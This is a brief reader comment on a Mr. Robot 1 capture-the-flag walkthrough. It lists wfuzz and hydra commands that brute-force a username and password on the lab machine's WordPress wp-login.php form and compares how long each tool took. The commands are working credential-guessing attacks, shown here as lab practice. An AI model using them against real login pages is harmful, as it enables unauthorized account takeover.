Mr. Robot 1 CTF Walkthrough

Excellent article! I loved the pedagogy of presenting your way of thinking rather than just giving the solution like others do!
To crack the username and password on wp-login.php I used the wfuzz and hydra tools.
time wfuzz -v -c -z file,/root/Documents/MrRobot/fsoc.dic --hs Invalid -d "log=FUZZ&pwd=ffffff"

real: 2m25

time wfuzz -v -c -z file,/root/Documents/MrRobot/fsoc.dic --hs incorrect -d "log=elliot&pwd=FUZZ"

real: 2m57

time hydra -L fsoc.dic -p DDDDD http-form-post "/wp-login.php:log=^USER^&pwd=ddddd:invalid"

real: 14m18

hydra -l elliot -P fsoc.dic http-form-post "/wp-login.php:log=elliot&pwd=^PASS^:incorrect"

real: 7m51

Isn't it amazing that wfuzz is so much faster than hydra!

Like what you read? Give Fahmi MEGDICHE a round of applause.
